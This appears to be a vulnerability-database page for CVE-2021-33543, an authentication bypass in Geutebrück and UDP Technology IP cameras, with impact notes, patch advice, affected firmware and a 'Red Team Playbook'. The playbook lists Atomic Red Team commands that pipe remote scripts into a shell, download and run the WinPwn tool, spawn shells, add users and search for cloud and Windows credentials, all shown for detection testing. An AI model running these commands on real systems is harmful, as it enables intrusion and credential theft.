CVE-2021-33543
Overview
This vulnerability is an authentication bypass caused by default user authentication settings that allow unauthenticated remote access. The root cause lies in the lack of enforced authentication mechanisms on affected Geutebrück E2 Series camera devices. The affected component is the device's user authentication system, which fails to restrict access to sensitive files and management interfaces over the network.
Vulnerability Description
Multiple camera devices by UDP Technology, Geutebrück and other vendors allow unauthenticated remote access to sensitive files due to default user authentication settings. This can lead to manipulation of the device and denial of service.
Impact
An attacker with network access can exploit this vulnerability without authentication to retrieve sensitive files, manipulate device settings, and cause denial of service. This can result in unauthorized control over camera operations, data leakage, and disruption of surveillance capabilities. The vulnerability's CVSS vector (AV:N/AC:L/PR:N/UI:N) indicates remote network exploitation with no privileges or user interaction required, amplifying the risk of compromise in exposed environments.
Solution
Geutebrück and UDP Technology recommend updating affected devices to firmware versions that enforce authentication, as detailed in the CISA ICS advisory ICSA-21-208-03. Specific firmware updates include versions later than 1.12.14.5 for g-cam_ebc-2110 and g-cam_ebc_2111 models. Administrators should apply these patches promptly and consult the referenced advisories at https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03 for detailed remediation instructions.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability affecting multiple camera devices from UDP Technology, Geutebrück, and other vendors stems from inadequate user authentication settings, which allow unauthenticated remote access to sensitive files. This flaw arises from default configurations that do not require proper credentials for accessing the device's functionalities. As a result, attackers can exploit this weakness to gain control over the devices, leading to unauthorized manipulation and potential denial of service. The severity of this vulnerability is underscored by its high CVSS score of 9.8, indicating a critical risk to the integrity and availability of the affected systems.
Attack vectors for this vulnerability are particularly concerning due to the nature of the devices involved. An attacker can leverage network access to interact with the camera systems without any form of authentication. This could involve scanning for devices on the network that are using default settings, which is a common practice among many organizations. Once access is gained, the attacker could manipulate the camera feeds, alter configurations, or even disable the devices entirely, resulting in a denial of service. Furthermore, the ability to access sensitive files could lead to data breaches, where confidential footage or images could be exfiltrated and misused.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on these camera systems for security and surveillance. Businesses in sectors such as retail, banking, and critical infrastructure are at heightened risk, as unauthorized access could compromise security measures and expose sensitive information. The potential for operational disruption is also a major concern, as attackers could disable cameras or alter their settings to create blind spots, thereby facilitating further malicious activities. The financial implications of such incidents could be severe, encompassing costs related to incident response, legal liabilities, and reputational damage.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, conducting a thorough inventory of all camera devices in use is essential to identify those that may be vulnerable due to default settings. Regular vulnerability assessments and penetration testing can help uncover any existing weaknesses in the network. Organizations should also enforce strong authentication mechanisms, ensuring that all devices are configured to require unique, complex passwords that are regularly updated. Additionally, network segmentation can limit the exposure of these devices to unauthorized access, while monitoring and logging access attempts can provide valuable insights into potential exploitation.
In conclusion, the vulnerability affecting camera devices from various vendors poses a serious threat to security and operational integrity. The combination of unauthenticated access and the critical nature of the devices involved creates a compelling case for immediate attention from organizations utilizing these systems. By adopting robust security practices, including proper configuration, continuous monitoring, and proactive vulnerability management, businesses can significantly reduce their risk and protect against potential exploitation. The importance of addressing such vulnerabilities cannot be overstated, as the consequences of inaction could lead to severe operational and financial repercussions.
Affected Products (48)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Geutebrueck | G-Cam Ebc-2110 Firmware | All |
cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:*:*:*:*:*:*:*:*
|
|
|
Geutebrueck | G-Cam Ebc-2110 Firmware | 1.12.13.2 |
cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.13.2:*:*:*:*:*:*:*
|
|
|
Geutebrueck | G-Cam Ebc-2110 Firmware | 1.12.14.5 |
cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.14.5:*:*:*:*:*:*:*
|
|
|
Geutebrueck | G-Cam Ebc-2111 Firmware | All |
cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:*:*:*:*:*:*:*:*
|
|
|
Geutebrueck | G-Cam Ebc-2111 Firmware | 1.12.13.2 |
cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.13.2:*:*:*:*:*:*:*
|
|
|
Geutebrueck | G-Cam Ebc-2111 Firmware | 1.12.14.5 |
cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.14.5:*:*:*:*:*:*:*
|
|
|
Geutebrueck | G-Cam Efd-2241 Firmware | All |
cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:*:*:*:*:*:*:*:*
|
|
|
Geutebrueck | G-Cam Efd-2241 Firmware | 1.12.13.2 |
cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.13.2:*:*:*:*:*:*:*
|
|
|
Geutebrueck | G-Cam Efd-2241 Firmware | 1.12.14.5 |
cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.14.5:*:*:*:*:*:*:*
|
|
|
Geutebrueck | G-Cam Efd-2250 Firmware | All |
cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:*:*:*:*:*:*:*:*
|
|
|
Geutebrueck | G-Cam Efd-2250 Firmware | 1.12.13.2 |
cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.13.2:*:*:*:*:*:*:*
|
|
|
Geutebrueck | G-Cam Efd-2250 Firmware | 1.12.14.5 |
cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.14.5:*:*:*:*:*:*:*
|
|
|
Geutebrueck | G-Cam Ethc-2230 Firmware | All |
cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:*:*:*:*:*:*:*:*
|
|
|
Geutebrueck | G-Cam Ethc-2230 Firmware | 1.12.13.2 |
cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.13.2:*:*:*:*:*:*:*
|
|
|
Geutebrueck | G-Cam Ethc-2230 Firmware | 1.12.14.5 |
cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.14.5:*:*:*:*:*:*:*
|
|
|
Geutebrueck | G-Cam Ethc-2239 Firmware | All |
cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:*:*:*:*:*:*:*:*
|
|
|
Geutebrueck | G-Cam Ethc-2239 Firmware | 1.12.13.2 |
cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.13.2:*:*:*:*:*:*:*
|
|
|
Geutebrueck | G-Cam Ethc-2239 Firmware | 1.12.14.5 |
cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.14.5:*:*:*:*:*:*:*
|
|
|
Geutebrueck | G-Cam Ethc-2240 Firmware | All |
cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:*:*:*:*:*:*:*:*
|
|
|
Geutebrueck | G-Cam Ethc-2240 Firmware | 1.12.13.2 |
cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.13.2:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Geutebruck Multiple Remote Command Execution
exploits/linux/http/geutebruck_cmdinject_cve_2021_335xx
|
Titouan Lazard, Ibrahim Ayadhi, Sébastien Charbonnier | Unknown | unix, linux | View |
Threat Feed
1 eventsPublic exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-33543 |
| randorisec.fr |
GitHub CVE
x_refsource_CONFIRM
|
https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/ |
| us-cert.cisa.gov |
GitHub CVE
x_refsource_CONFIRM
|
https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03 |